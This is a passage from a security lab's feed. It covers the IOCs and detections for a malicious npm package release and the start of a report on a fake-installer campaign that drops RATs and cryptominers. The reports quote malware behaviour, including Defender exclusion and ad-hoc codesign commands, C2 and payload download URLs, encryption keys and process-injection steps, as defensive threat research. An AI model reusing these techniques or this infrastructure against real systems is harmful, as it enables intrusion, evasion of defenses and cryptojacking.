<p>The payload path itself triggers the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a> and <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a> endpoint rules, as it mimics Apple naming conventions (<code>com.apple.*</code>) but does not match expected signing characteristics.</p>
<p><code>com.apple.act.mond</code> is a custom-built macOS backdoor compiled as a universal Mach-O binary (x86_64 and ARM64) using C++ and Xcode, with HTTP-based C2 communications via <code>libcurl</code> and a JSON command protocol.</p>
<p>On initial check-in, it fingerprints the host, collecting hostname, username, OS version, hardware model, timezone, and a full process listing (<code>ps -eo user,pid,command</code>), which surfaces via the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a> endpoint rule, capturing unexpected child process activity originating from the backdoor:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image4.png" alt="Elastic Defend macOS alert triggering on the process enumeration from the macOS backdoor" title="Elastic Defend macOS alert triggering on the process enumeration from the macOS backdoor" /></p>
<p>The macOS backdoor facilitates:</p>
<ul>
<li>C2 connection by passing a URL directly as an argument.</li>
<li>AppleScript execution using <code>osascript</code> via temporary hidden <code>.scpt</code> files dropped to <code>/tmp/</code></li>
<li>Filesystem enumeration targeting <code>/Applications</code> and <code>~/Library/Application Support</code></li>
<li>Downloading and executing remote base64-encoded payloads.</li>
<li>Ad-hoc code signing of dropped payloads (<code>codesign --force --deep --sign - “/private/tmp/.*”</code>)  so it can run past Gatekeeper.</li>
</ul>
<p>The binary is not packed or obfuscated, ships with debug entitlements enabled, and retains developer build paths (<code>Jain_DEV/client_mac/macWebT</code>) and uses a spoofed IE8/Windows XP user-agent string (mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)).</p>
<p>These detections collectively follow the macOS delivery path from staged AppleScript execution to payload launch and post-execution behavior:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a></li>
</ul>
<h2>Conclusion</h2>
<p>This supply chain attack highlights how little complexity is required to achieve cross-platform compromise when execution is triggered during installation.</p>
<p>Across Linux, Windows, and macOS, we consistently observed the same core pattern: a Node.js process spawning native OS execution to retrieve and launch a remote payload, followed by immediate detachment or hidden execution.</p>
<p>From a detection perspective, the key takeaway is that the most reliable signals are not in the package itself, but in what happens immediately after installation. Process ancestry, network retrieval, and detached execution provide a stable detection surface that remains effective even when payloads, filenames, or infrastructure change.</p>
<p>Elastic detections focused on this behavior provided consistent coverage of the delivery stage across all platforms, without relying on static indicators.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Related Alerts</h3>
<table>
<thead>
<tr>
<th align="left">Alert</th>
<th align="left">Operating System</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via</a> <a href="http://Node.js">Node.js</a></td>
<td align="left">Linux</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a></td>
<td align="left">Linux</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a></td>
<td align="left">macOS</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a></td>
<td align="left">macOS</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a></td>
<td align="left">macOS</td>
</tr>
</tbody>
</table>
<h3>Malicious Packages</h3>
<table>
<thead>
<tr>
<th>Package</th>
<th>Version</th>
<th>Hash (shasum)</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>axios</code></td>
<td><code>1.14.1</code></td>
<td><code>2553649f232204966871cea80a5d0d6adc700ca</code></td>
</tr>
<tr>
<td><code>axios</code></td>
<td><code>0.30.4</code></td>
<td><code>d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71</code></td>
</tr>
<tr>
<td><code>plain-crypto-js</code></td>
<td><code>4.2.1</code></td>
<td><code>07d889e2dadce6f3910dcbc253317d28ca61c766</code></td>
</tr>
</tbody>
</table>
<p>Additional related packages observed in the ecosystem abuse:</p>
<table>
<thead>
<tr>
<th>Package</th>
<th>Version</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>@shadanai/openclaw</code></td>
<td><code>2026.3.28-2</code>, <code>2026.3.28-3</code>, <code>2026.3.31-1</code>, <code>2026.3.31-2</code></td>
</tr>
<tr>
<td><code>@qqbrowser/openclaw-qbot</code></td>
<td><code>0.0.130</code></td>
</tr>
</tbody>
</table>
<h3>Script / Payload Hashes (SHA256)</h3>
<table>
<thead>
<tr>
<th>File</th>
<th>SHA256</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>setup.js</code></td>
<td><code>e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</code></td>
</tr>
<tr>
<td><code>/tmp/ld.py</code></td>
<td><code>6483c004e207137385f480909d6edecf1b699087378aa91745ecba7c3394f9d7</code></td>
</tr>
<tr>
<td><code>6202033.ps1</code></td>
<td><code>ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c</code></td>
</tr>
<tr>
<td><code>system.bat</code></td>
<td><code>e49c2732fb9861548208a78e72996b9c3c470b6b562576924bcc3a9fb75bf9ff</code></td>
</tr>
<tr>
<td><code>com.apple.act.mond</code></td>
<td><code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
</tr>
</tbody>
</table>
<h3>Network Indicators</h3>
<table>
<thead>
<tr>
<th>Type</th>
<th>Indicator</th>
</tr>
</thead>
<tbody>
<tr>
<td>C2 Domain</td>
<td><code>sfrclak[.]com</code></td>
</tr>
<tr>
<td>C2 IP</td>
<td><code>142.11.206[.]73</code></td>
</tr>
<tr>
<td>C2 URL</td>
<td><code>http://sfrclak[.]com:8000/6202033</code></td>
</tr>
<tr>
<td>User-Agent</td>
<td><code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></td>
</tr>
<tr>
<td>macOS POST body</td>
<td><code>packages[.]npm[.]org/product0</code></td>
</tr>
<tr>
<td>Windows POST body</td>
<td><code>packages[.]npm[.]org/product1</code></td>
</tr>
<tr>
<td>Linux POST body</td>
<td><code>packages[.]npm[.]org/product2</code></td>
</tr>
</tbody>
</table>
<h3>File System Indicators</h3>
<h4>Cross-platform</h4>
<table>
<thead>
<tr>
<th>Path / Artifact</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>$TMPDIR/6202033</code></td>
<td>Temporary staging artifact</td>
</tr>
<tr>
<td><code>*/node_modules/plain-crypto-js/setup.js</code></td>
<td>Node.js first-stage dropper</td>
</tr>
</tbody>
</table>
<h4>Linux</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/tmp/ld.py</code></td>
<td>Python RAT second stage</td>
</tr>
</tbody>
</table>
<h4>Windows</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>%PROGRAMDATA%\wt.exe</code></td>
<td>Renamed <code>powershell.exe</code> (execution proxy)</td>
</tr>
<tr>
<td><code>%PROGRAMDATA%\system.bat</code></td>
<td>Persistence launcher</td>
</tr>
<tr>
<td><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate</code></td>
<td>Persistence key</td>
</tr>
<tr>
<td><code>%TEMP%\6202033.vbs</code></td>
<td>VBS launcher (self-deletes)</td>
</tr>
<tr>
<td><code>%TEMP%\6202033.ps1</code></td>
<td>PowerShell payload (self-deletes)</td>
</tr>
</tbody>
</table>
<h4>macOS</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/Library/Caches/com.apple.act.mond</code></td>
<td>Mach-O backdoor payload</td>
</tr>
<tr>
<td><code>/tmp/*.scpt</code></td>
<td>Temporary AppleScript launcher</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/axios-supply-chain-compromise-detections.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Fake Installers to Monero: A Multi-Tool Mining Operation]]></title>
            <link>https://www.elastic.co/security-labs/fake-installers-to-monero</link>
            <guid>fake-installers-to-monero</guid>
            <pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs dissects a long-running operation deploying RATs, cryptominers, and CPA fraud through fake installer lures, tracking its evolution across campaigns and Monero payouts.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Security Labs has been tracking a financially motivated operation, designated REF1695, that has been active since at least late 2023. The operator deploys a combination of RATs, cryptominers, and custom XMRig loaders through fake installer packages. Across all observed campaigns, the infection chains share a consistent packing technique, overlapping C2 infrastructure, and common social engineering patterns, linking them to a single operator.</p>
<p>Beyond cryptomining, the threat actor monetizes infections through CPA (Cost Per Action) fraud, directing victims to content locker pages under the guise of software registration. In this report, we trace the operation's evolution across multiple campaign builds, analyze the C2 communication protocols, document a previously unreported .NET implant (CNB Bot), and track the operator's financial returns via public Monero mining pool dashboards.</p>
<h3>Key takeaways</h3>
<ul>
<li>Financially motivated campaigns have been active since late 2023, deploying various RATs and cryptominers through fake installer packages.</li>
<li>Operator monetizes infections through both cryptomining and CPABuild fraud.</li>
<li>Stages use a consistent Themida/WinLicense + .NET Reactor packing combination</li>
<li>CNB Bot is a previously undocumented .NET implant with RSA-2048 signed task authentication</li>
<li>A custom XMRig loader evades detection by killing the miner whenever analysis tools are running and deploys WinRing0x64.sys</li>
<li>Over 27.88 XMR paid out across four tracked wallets, with active workers at the time of writing</li>
<li>We leveraged a Claude-driven agentic pipeline to automate the extraction of payload stages and implant configurations</li>
</ul>
<h2>Campaign 1 (CNB Bot)</h2>
<p>The most recent campaign involves dropping CNB Bot, using an ISO file as the infection vector. The ISO image contains 2 files: a single-stage .NET Reactor-protected loader further packed with Themida/WinLicense 3.x, and a ReadMe.txt. Associated ISO samples:</p>
<ul>
<li><code>460203070b5a928390b126fcd52c15ed3a668b77536faa6f0a0282cf1c157162</code></li>
<li><code>b8b7aecce2a4d00f209b1e4d30128ba6ef0f83bbdc05127f6f8ba97e7d6df291</code></li>
<li><code>9977b9185472c7d4be22c20f93bc401dd74bb47223957015a3261994d54c59fc</code></li>
<li><code>9fa23382820b1e781f3e05e9452176a72529395643f09080777fab7b9c6b1f5c</code></li>
<li><code>27db41f654b53e41a4e1621a83f2478fa46b1bbffc1923e5070440a7d410b8d3</code></li>
</ul>
<p>The ReadMe.txt serves as a social engineering lure, framing the unsigned binary as the product of a small non-profit team that cannot afford EV code-signing, then provides explicit instructions to bypass SmartScreen via <code>&quot;More Info&quot; → &quot;Run Anyway.&quot;</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image4.png" alt="ReadMe.txt lure" title="ReadMe.txt lure" /></p>
<p>Using the open-source Themida/Winlicense unpacker project, <a href="https://github.com/ergrelet/unlicense">Unlicense</a>, we automatically extracted the .NET Reactor-protected loader and then passed it through <a href="https://github.com/SychicBoy/NETReactorSlayer">NETReactorSlayer</a> for deobfuscation. The majority of campaigns were observed to use this combination of protection in both the initial and subsequent stages.</p>
<p>The loader first invokes PowerShell with <code>-WindowStyle Hidden</code>, to register broad Microsoft Defender exclusions via <code>Add-MpPreference -ExclusionPath</code> and <code>Add-MpPreference -ExclusionProcess</code>, covering the loader itself, staging directories (<code>%TEMP%</code>, <code>%LocalAppData%</code>, <code>%AppData%</code>) and a set of LOLBin process names the malware later utilizes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image10.png" alt="Setting up Microsoft Defender exclusions" title="Setting up Microsoft Defender exclusions" /></p>
<p>It then extracts an embedded .NET assembly resource and writes it to disk at <code>%TEMP%\MLPCInstallHelper.exe</code> (filename varies by build), then executes it via PowerShell. This embedded resource is a .NET Reactor-protected CNB Bot instance, discussed in detail in the <strong>Code Analysis - CNB Bot</strong> section below.</p>
<p>Since no legitimate software is installed at any point, the loader presents a fake error dialog to the user, attributing the installation failure to unmet system requirements.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image13.png" alt="Fake error dialog" title="Fake error dialog" /></p>
<h2>Campaign 2 (PureRAT)</h2>
<p>Pivoting on the ReadMe.txt lure content, we discovered a campaign dropping PureRAT v3.0.1. This campaign uses a very similar initial-stage loader as campaign 1 and introduces a second-stage loader.</p>
<p>Example ISO samples employing this chain:</p>
<ul>
<li><code>7bb0e91558244bcc79b6d7a4fe9d9882f11d3a99b70e1527aac979e27165f1d7</code></li>
<li><code>c6c4a9725653b585a9d65fc90698d4610579b289bcfb2539f7a5f7e64e69f2e4</code></li>
<li><code>a3f84aa1d15fd33506157c61368fd602d0b81f69aff6c69249bf833d217308bb</code></li>
<li><code>82c03866670b70047209c39153615512f7253f125a252fe3dcd828c6598fdf86</code></li>
<li><code>542d2267b40c160b693646bc852df34cc508281c4f6ed2693b98147dae293678</code></li>
</ul>
<p>We will be using the first sample from this list as an example for our analysis.</p>
<p>The initial-stage loader applies Microsoft Defender exclusions to the same directory set (<code>%TEMP%</code>, loader path, <code>%LocalAppData%</code>, …), but process exclusions are limited to the loader executable only. The Stage 2 payload is extracted from the embedded resource to <code>%TEMP%\&lt;...&gt;InstallHelper.exe</code> and launched via hidden PowerShell <code>Start-Process</code>. Stage 2 is protected with the same Themida + .NET Reactor packing technique.</p>
<p>Stage 2 registers only process-level Microsoft Defender exclusions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image22.png" alt="Setting up Microsoft Defender exclusions" title="Setting up Microsoft Defender exclusions" /></p>
<p>The loader then extracts four embedded resources into the install directory at <code>%SystemDrive%\Users\%UserName%\AppData\Local\SVCData\Config</code>, dropping 3 unused, benign DLLs and a malicious <code>svchost.exe</code> binary, which is the 3rd stage. Stage 3 is launched through PowerShell, and a scheduled task named <code>SVCConfig</code> is registered via <code>schtasks.exe</code> with an <code>ONLOGON</code> trigger and <code>HIGHEST</code> privilege.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image33.png" alt="Stage 3 installation" title="Stage 3 installation" /></p>
<p>Following payload launch, Stage 2 writes a temporary .bat file to <code>%TEMP%</code> with a polling loop that forcefully deletes the installer binary until successful, then deletes the batch file itself.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image38.png" alt="Self-delete installer binary" title="Self-delete installer binary" /></p>
<p>Stage 3 is a Themida + .NET Reactor-protected, in-memory PE loader, which is also the beginning of the PureRAT component. The encrypted next-stage module is stored as a .NET resource and decrypted via Triple DES (3DES) in CBC mode using an embedded key and IV. The decrypted output is a GZip-compressed PE: the first 4 bytes encode the decompressed size as a little-endian integer, followed by the GZip stream.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image3.png" alt="PureRAT next-stage decryption" title="PureRAT next-stage decryption" /></p>
<p>The PureRAT v3.0.1 configuration is decoded by base64-decoding an embedded string and deserializing the result as a Protobuf message:</p>
<ul>
<li><code>23-01-26</code> (build / campaign date)</li>
<li><code>windirautoupdates[.]top</code> (C2 #1)</li>
<li><code>winautordr.itemdb[.]com</code> (C2 #2)</li>
<li><code>winautordr.ydns[.]eu</code> (C2 #3)</li>
<li><code>winautordr.kozow[.]com</code>  (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image17.png" alt="PureRAT decoded configuration" title="PureRAT decoded configuration" /></p>
<p>The C2 communication protocol uses key derivation function - <code>PBKDF2-SHA1(&quot;Aesthetics135&quot;, embedded_salt=010217EA2530863FF804, iter=5000)</code> to derive 96 bytes, split into an AES-256-CBC key and an HMAC-SHA256 key. Incoming messages are authenticated by verifying the HMAC over <code>[IV | ciphertext]</code> stored in the first 32 bytes; the IV is then read from byte offset (32- 48) and used to decrypt the remaining ciphertext, yielding a <a href="https://protobuf.dev/">Protobuf</a>-encoded command message.</p>
<p>By decrypting traffic captured in VirusTotal sandboxes, we observed that the C2 server at <code>windirautoupdates[.]top</code> was automatically issuing a download-and-execute task directing the implant to fetch an XMR mining payload from <code>https://github[.]com/lebnabar198/Hgh5gM99fe3dG/raw/refs/heads/main/MnrsInstllr_240126[.]exe</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image24.png" alt="PureRAT initial task decryption" title="PureRAT initial task decryption" /></p>
<h2>Campaign 3 (PureRAT, PureMiner, XMRig loader)</h2>
<p>The third campaign variant shares the same initial-stage loader design as Campaigns 1 and 2. Its Stage 2 resembles Campaign 2 but differs by dropping multiple embedded payloads from the resource section, including PureRAT, a custom XMRig loader, and PureMiner.</p>
<p>Example ISO sample:</p>
<ul>
<li><code>f84b00fc75f183c571c8f49fcc1d7e0241f538025db0f2daa4e2c5b9a6739049</code>.</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image40.png" alt="Installation of PureRAT, PureMiner, and a custom XMRig loader" title="Installation of PureRAT, PureMiner, and a custom XMRig loader" /></p>
<p>To keep the machine awake and maximize mining uptime, the loader disables sleep and hibernation via Windows power management commands:</p>
<ul>
<li><code>powercfg /change standby-timeout-ac 0</code></li>
<li><code>powercfg /change standby-timeout-dc 0</code></li>
<li><code>powercfg /change hibernate-timeout-ac 0</code></li>
<li><code>powercfg /change hibernate-timeout-dc 0</code></li>
</ul>
<p>The PureRAT configuration matches Campaign 2, differing only in the build/campaign ID: <code>25-11-25</code>.</p>
<p>The PE loader component of PureMiner is similar to PureRAT, and the decrypted module is also obfuscated via .NET Reactor. Since the configuration is Protobuf-serialized, hooking <code>ProtoBuf.Serializer::Deserialize</code> allows inspection of the configuration data:</p>
<ul>
<li><code>25-11-25</code> (build / campaign date)</li>
<li><code>wndlogon.hopto[.]org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb[.]com</code> (C2 #2)</li>
<li><code>wndlogon.ydns[.]eu</code> (C2 #3)</li>
<li><code>wndlogon.kozow[.]com</code> (C2 #4)</li>
<li><code>4c271ad41ea2f6a44ce8d0</code> (mutex and C2 comms key)</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image41.png" alt="PureMiner decoded configuration" title="PureMiner decoded configuration" /></p>
<p>Additional behavioral indicators include the dynamic loading of AMD Display Library binaries (<code>atiadlxx.dll</code>/<code>atiadlxy.dll</code>) and the NVIDIA API library (<code>nvapi64.dll</code>), consistent with GPU hardware profiling techniques employed by PureMiner.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image1.png" alt="PureMiner loading atiadlxx.dll, atiadlxy.dll, and nvapi64.dll" title="PureMiner loading atiadlxx.dll, atiadlxy.dll, and nvapi64.dll" /></p>
<h3>Custom .NET-Based Loader for XMRig</h3>
<p>The following findings cover the custom XMRig loader deployed during this campaign. Analyzed samples:</p>
<ul>
<li><code>0176ffaf278b9281aa207c59b858c8c0b6e38fdb13141f7ed391c9f8b2dc7630</code></li>
<li><code>9409f9c398645ddac096e3331d2782705b62e388a8ecb1c4e9d527616f0c6a9e</code></li>
<li><code>f84b00fc75f183c571c8f49fcc1d7e0241f538025db0f2daa4e2c5b9a6739049</code></li>
</ul>
<h4>The Entry Point and Setup</h4>
<p>Execution begins in the <code>Start()</code> method. The loader first calls <code>FetchRemoteConfig()</code>, which reaches out to a hardcoded URL (<code>https://autoupdatewinsystem[.]top/MyMNRconfigs/0226.txt</code>). The response is AES-encrypted JSON, which the loader decrypts using a hardcoded key (<code>AsyncPrivateInputx64</code>) and parses to extract the pool, wallet, and mining arguments. If the remote server is unreachable or decryption fails, it falls back to a hardcoded <code>ztbpVbABSx1jDIKnWGbx1d_0</code> configuration to ensure mining can still occur.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image26.png" alt="The hard-coded configuration when the online config is unavailable" title="The hard-coded configuration when the online config is unavailable" /></p>
<h4>Resource Extraction</h4>
<p>Simultaneously, an asynchronous task triggers <code>ExtractResources()</code>. The loader checks the <code>%TEMP%</code> directory for two files: <code>procsrv.exe</code> (the renamed XMRig payload) and <code>WinRing0x64.sys</code> (a driver used by XMRig for direct hardware access). If either is absent, the loader unpacks them from its own assembly manifest.</p>
<h4>Evasion Loop</h4>
<p>After a 3-second sleep, the loader calls <code>StartEvasionTimer()</code>, initializing a timer that ticks every 1,000 milliseconds. On each tick, <code>IsAnalysisToolRunning()</code> compares all running process names against a hardcoded list of 35 security and monitoring tools (<code>Taskmgr</code>, <code>ProcessHacker</code>, <code>Wireshark</code>, <code>Procmon</code>, etc.).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image34.png" alt="Monitoring tools that are targeted" title="Monitoring tools that are targeted" /></p>
<p>If any analysis tool is detected, the loader immediately calls <code>KillMinerProcess()</code>, terminating <code>procsrv.exe</code>, effectively dropping the CPU usage back to normal.</p>
<p>If no analysis tool is detected, the loader calls <code>CheckAndRunMiner()</code>. If the miner is not currently running, it reconstructs the command-line arguments (using the remote or fallback config) and quietly launches the miner as a hidden background process via <code>LaunchMiner()</code>.</p>
<p>This creates a &quot;hide and seek&quot; scenario for the victim. Whenever they try to investigate why their PC is slow, the malware shuts down the miner.</p>
<h4>WinRing0x64.sys and Ring 0 Access</h4>
<p>The loader also drops and loads <code>WinRing0x64.sys</code>, a legitimate open-source driver frequently abused by cryptominers. The driver provides direct Ring 0 (kernel-level) hardware access, which XMRig uses to apply its Model Specific Register (MSR) modification, reconfiguring CPU prefetcher and L3 cache behavior to significantly boost RandomX (Monero) hash rates.</p>
<h2>Campaign 4 - Umnr_ (SilentCryptoMiner)</h2>
<p>From the <code>autoupdatewinsystem[.]top</code> domain, we identified another GitHub account <code>https://github[.]com/ugurlutaha6116</code> hosting another loader variant whose executable name is prefixed with <code>Umnr_</code>. This loader is a Themida-packed SilentCryptoMiner loader that installs persistently on the victim machine, injects a watchdog payload into <code>conhost.exe</code>, and a miner payload into <code>explorer.exe</code>, mining ETH or XMR depending on the build configuration.</p>
<p>SilentCryptoMiner is a closed-source Win32 64-bit malware released for free on <a href="https://github.com/Unam-Sanctam/SilentCryptoMiner">GitHub</a>. The samples we analyzed are older versions than the latest <a href="https://github.com/Unam-Sanctam/SilentCryptoMiner/releases">release</a>:</p>
<ul>
<li><code>1f7441d72eff2e9403be1d9ce0bb07792793b2cb963f2601ecfdf8c91cd9af73</code></li>
<li><code>468441d32f62520020d57ff1f24bb08af1bc10e9b4d4da1b937450f44e80a9be</code></li>
<li><code>4e6b8fdd819293ca3fe8f8add6937bf6531a936955d9ac974a6b231823c7330e</code></li>
<li><code>6492e50e79b979254314988228a513d5acbdaa950346414955dc052ae77d2988</code></li>
<li><code>ce90cb3a9bfb8a276cb50462be932e063ed408af8c5591dd2c50f1c6d18c394c</code></li>
</ul>
<h4>Direct Syscalls</h4>
<p>To evade detection, SilentCryptoMiner uses direct syscalls instead of <code>NTDLL</code> functions. To do this, it parses <code>NTDLL</code> exports to locate the target function by a hash of its name, extracts the syscall number, and manually executes the syscall instruction sequence.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image36.png" alt="Direct syscall procedure" title="Direct syscall procedure" /></p>
<h4>Disable Sleep and Hibernate</h4>
<p>To ensure it can use the host machine for as long as possible, SilentCryptoMiner disables Windows sleep and hibernation by executing a shell command.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image5.png" alt="Disable windows sleep and hibernate" title="Disable windows sleep and hibernate" /></p>
<h4>Install Persistence</h4>
<p>After copying itself to its installation folder (in this case, configured to masquerade as legitimate software named “<code>Appdata/Local/OptimizeMS/optims.exe</code>”), SilentCryptoMiner proceeds to establish persistence. If the process is running with administrator privileges, it creates a scheduled task configured via an XML file.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image8.png" alt="Schtask task creation for persistence" title="Schtask task creation for persistence" /></p>
<p>The XML file is dropped onto the disk in the <code>AppData/Local/Temp</code> folder and contains the task configuration. One interesting setting is <code>AllowHardTerminate = False</code>, which prevents the task from being forcibly terminated via <code>schtasks</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image14.png" alt="Malware XML task configuration" title="Malware XML task configuration" /></p>
<p>If the process lacks administrator rights, it instead adds a <strong>Run</strong> key to the registry.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image35.png" alt="Malware adds a run key for persistence if not running as administrator" title="Malware adds a run key for persistence if not running as administrator" /></p>
<p>After initial installation, the process terminates. On subsequent execution by the persistence mechanism, it verifies that it is running from its installation directory before proceeding to the process injection phase.</p>
<h4>Inject watchdog and miner payloads</h4>
<p>In the samples we analyzed, the builds contain four payloads:</p>
<ul>
<li>A <code>Winring0.sys</code> driver</li>
<li>A watchdog process</li>
<li>A Monero miner</li>
<li>An Ethereum miner</li>
</ul>
<p>We know that the malware can contain multiple miners; however, in our tests, we only observed the Monero miner injected into a process. In the code, only one of the two miners is injected, which we assume depends on the configuration.</p>
<p>SilentCryptoMiner initiates injection by creating a new suspended process with a spoofed parent process. It obtains a handle to <code>explorer.exe</code> using <code>NtQuerySystemInformation</code> and <code>NtOpenProcess</code>, then configures a <code>PS_ATTRIBUTE_LIST</code> structure with the handle for parent spoofing and passes it to <code>NtCreateUserProcess</code>.</p>
<p>The payload is written to disk via <code>NtCreateFile</code> and <code>NtWriteFile</code>, then mapped into the target process's memory space through <code>NtCreateSection</code> and <code>NtMapViewOfSection</code>. Execution flow is hijacked by modifying the suspended process's entry point (in the <code>RCX</code> register) to point to the payload's image base using <code>NtGetContextThread</code> and <code>NtSetContextThread</code>. The process's PEB (in <code>RDX</code> register) image base is also set to the payload's address using <code>NtWriteVirtualMemory</code>. Finally, the process is resumed with <code>NtResumeThread</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image21.png" alt="Process injection procedure" title="Process injection procedure" /></p>
<p>The payload data is decrypted from a hardcoded blob in the binary using a simple XOR cipher with a hardcoded key. After injection, the blob is re-encrypted in memory to reduce forensic traces.</p>
